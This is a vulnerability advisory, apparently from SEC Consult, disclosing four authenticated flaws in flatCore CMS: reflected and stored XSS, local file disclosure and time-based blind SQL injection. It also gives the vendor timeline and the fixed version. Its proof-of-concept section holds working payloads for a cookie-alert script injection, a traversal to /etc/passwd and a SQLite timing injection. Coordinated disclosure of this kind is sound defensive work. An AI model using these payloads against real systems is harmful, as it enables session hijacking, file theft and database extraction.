flatCore CMS XSS / File Disclosure / SQL Injection

`SEC Consult Vulnerability Lab Security Advisory < 20210113-1 >  
=======================================================================  
title: Multiple Vulnerabilities  
product: flatCore CMS  
vulnerable version: < 2.0.0 Build 139  
fixed version: Release 2.0.0 Build 139  
CVE number: CVE-2021-23835, CVE-2021-23836, CVE-2021-23837, CVE-2021-23838  
impact: High  
homepage: https://flatcore.org/  
found: 2020-11-20  
by: Yew Chung Cheah (Office Singapore)  
Calvin Phang (Office Singapore)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Atos company  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"flatCore is based on PHP and PDO/SQLite. The Core is as minimalistic as  
possible, but can be easily extended by the modular structure. If you are  
looking for a solution to edit your website live and with ease, flatCore  
may be your buddy."  
  
Source: https://flatcore.org/  
  
  
Business recommendation:  
------------------------  
The vendor provides an updated version which should be installed immediately.  
  
An in-depth security analysis performed by security professionals is highly  
advised, as the software may be affected from further security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Reflected Cross-Site Scripting (Authenticated user) (CVE-2021-23838)  
A reflected cross-site scripting vulnerability was identified in the 'media_filter'  
HTTP request body parameter for the 'acp' interface. The affected parameter  
accepts malicious client side script without proper input sanitization. For  
example, a malicious user can leverage this vulnerability to steal cookies  
from a victim user and perform a session hijacking attack which may then lead to  
unauthorized access to the site.  
  
2) Stored Cross-Site Scripting (Authenticated user) (CVE-2021-23836)  
A stored cross-site scripting vulnerability was identified in the 'prefs_smtp_psw'  
HTTP request body parameter for the 'acp' interface. An admin user can inject  
malicious client side script to the affected parameter without any form of  
input sanitization. The injected payload will be executed in the browser of a  
user whenever one visits the affected module page.  
  
3) Local File Disclosure (Authenticated user) (CVE-2021-23835)  
A local file disclosure vulnerability was identified in the 'docs_file'  
HTTP request body parameter for the 'acp' interface which can be exploited with  
admin access rights. The affected parameter which retrieves the contents of the  
specified file was found to be accepting malicious user inputs without proper input  
sanitization, thus leading to retrieval of backend server sensitive files, for  
example /etc/passwd, sqlite database files, PHP source code etc.  
  
4) Time Based Blind SQL Injection (Authenticated user) (CVE-2021-23837)  
A time based blind SQL injection was identified in the 'selected_folder'  
HTTP request body parameter for the 'acp' interface. The affected parameter  
which retrieves the file contents of the specified folder was found to be  
accepting malicious user inputs without proper input sanitization, thus leading  
to SQL injection. Database related information can be successfully retrieved.  
  
  
Proof of concept:  
-----------------  
1) Reflected Cross-Site Scripting (Authenticated user) (CVE-2021-23838)  
An authenticated admin user can exploit this vulnerability by manipulating  
the 'media_filter' parameter found in the Files/ Manage Files module.  
  
URL : http://$HOST/acp/acp.php?tn=filebrowser&sub=browse  
METHOD : POST  
PARAMETER : media_filter  
PAYLOAD : aaa%3cscript%3ealert(document.cookie)%3c%2fscript%3ebbb  
  
2) Stored Cross-Site Scripting (Authenticated user) (CVE-2021-23836)  
An authenticated admin user can exploit this vulnerability by manipulating  
the 'prefs_smtp_psw' parameter found in the System/ E-Mail module.  
  
URL : http://$HOST/acp/acp.php?tn=system&sub=mail  
METHOD : POST  
PARAMETER : prefs_smtp_psw  
PAYLOAD : '%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3eaaabbb  
  
3) Local File Disclosure (Authenticated user) (CVE-2021-23835)  
An authenticated admin user can exploit this vulnerability by manipulating  
the 'docs_file' parameter found in the help module.  
  
URL : http://$HOST/acp/acp.php  
METHOD : POST  
PARAMETER : docs_file  
PAYLOAD : %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd  
  
4) Time Based Blind SQL Injection (Authenticated user) (CVE-2021-23837)  
An authenticated admin user can exploit this vulnerability by manipulating  
the 'selected_folder' parameter found in the Files/ Manage Files module.  
  
URL : http://$HOST/acp/acp.php?tn=filebrowser&sub=browse  
METHOD : POST  
PARAMETER : selected_folder  
PAYLOAD : %' AND 8483=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'eJQr%'='eJQr  
  
  
Vulnerable / tested versions:  
-----------------------------  
flatCore CMS version 2.0.0 (Build 122) has been tested, which was the latest  
version available at the time of the test. Previous versions may also be affected.  
  
  
Vendor contact timeline:  
------------------------  
2020-12-14 | Contacting vendor through [email protected]  
2020-12-17 | Advisory sent to the vendor  
2020-12-31 | Requesting status update from vendor  
2021-01-05 | Vendor replied that the reported issues have been fixed in  
version 2.0.0 (Build 139) released at their official GitHub page  
2021-01-13 | Release of security advisory.  
  
  
Solution:  
---------  
The fixed version 2.0.0 (Build 139) is available for download at:  
https://github.com/flatCore/flatCore-CMS  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult, an Atos company  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Yew Chung Cheah, Calvin Phang / @2021  
  
`